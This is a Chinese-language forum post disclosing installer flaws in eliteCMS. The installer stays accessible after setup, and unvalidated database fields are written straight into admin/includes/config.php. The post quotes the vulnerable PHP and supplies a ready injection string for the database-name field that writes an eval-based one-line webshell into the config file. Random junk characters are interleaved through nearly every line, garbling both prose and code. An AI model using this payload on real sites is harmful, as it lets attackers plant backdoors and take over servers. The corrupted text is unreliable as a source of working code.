eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装% G4 ^; O2 y) M$ C4 j7 z1 T
7 {* p/ P8 Y1 d: W" p R% r" ^另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
2 T9 p3 H' m+ z) i4 C4 P% A0 c我们来看代码: d& @( p% U2 N( O+ p( V
9 k H5 v. U2 r+ g! U& P...
' v! m& l5 j" E0 O Qelseif ($_GET['step'] == "4") {
& T$ \( v# N5 m# n) V y $file = "../admin/includes/config.php";- c8 t' l! }/ r+ ?8 N% f. y* H
$write = "<?php\n";* S# G; t' X! U5 j2 q* x& k
$write .= "/**\n"; G* Q S8 r* i: M0 {* F: H
$write .= "*\n";7 N" ~( b5 S+ X
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
0 `& d; b- {: @" F...略...
5 ?5 V) Q* k# U $write .= "*\n";0 i) g, ]1 Q2 Y/ e6 M& r" c8 `
$write .= "*/\n";$ O( g0 U, E! s
$write .= "\n";
) e# N0 F q4 W$ l* ~$ e$ m $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";% b/ n0 z/ y" Y: O! L7 t: Z# x9 m% a
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";7 g& z, |* h4 j2 J2 |" n* W" c
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";2 i1 a# j, E, Y! F, K4 f. f1 q
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
6 x( _/ [) O4 T( H/ o$ L7 } $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";3 r# \5 a/ C- w9 ~' O
$write .= "if (!\$connection) {\n";5 I& I& _: X1 T2 u0 D- q
$write .= " die(\"Database connection failed\" .mysql_error());\n";/ v" h5 ^; h8 E9 Y
$write .= " \n";
3 n# i) |$ K6 ~ ]- V $write .= "} \n";8 L1 ~* F8 z/ C& R2 F0 T5 q' b- V
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";. b* ~, L- F: ~* O' A+ ~
$write .= "if (!\$db_select) {\n";- m; ^: w) \5 D& }) F4 F
$write .= " die(\"Database select failed\" .mysql_error());\n";) P7 s' a9 i$ j* Z3 \
$write .= " \n";- v# S0 |- x) Y0 Q( ^
$write .= "} \n";
3 H1 K/ D1 ~2 ?+ Y8 b$ o6 e $write .= "?>\n";7 z! s: |; b( V. F1 i6 U+ M
: Z6 }+ g1 N* {+ `8 a) s8 u
$writer = fopen($file, 'w');
' J; [4 q4 T7 P6 Z! T...
! ^6 h, `* }& A! Y2 r
3 Z# L/ U9 a- L% ]1 C0 k在看代码:3 T. Z3 d J( H
' {( @, v1 x/ W
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];+ R [* W& F: ]- Q1 J
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$ h9 b1 u& |) Z$ K% ~$_SESSION['DB_USER'] = $_POST['DB_USER'];
$ v! i( }* g/ V8 ?2 t$_SESSION['DB_PASS'] = $_POST['DB_PASS'];- [0 T$ ~+ v7 J: W% \
& y: p; Q: i: z+ Z8 F
取值未作任何验证4 A4 w) x1 z2 Z2 u
如果将数据库名POST数据:# ]& Z% C+ ~: q& k! k. |- I" m T. j3 J
5 o* A# ~! Y) D; C* `( ^2 C
"?><?php eval($_POST[c]);?><?php
3 p! `$ F1 x0 J
! j, k# D' X! Y Z# p- z- z将导致一句话后门写入/admin/includes/config.php
7 F! u8 y! B* e$ Y |
发表于 2012-11-18 13:59:27
收藏
支持
反对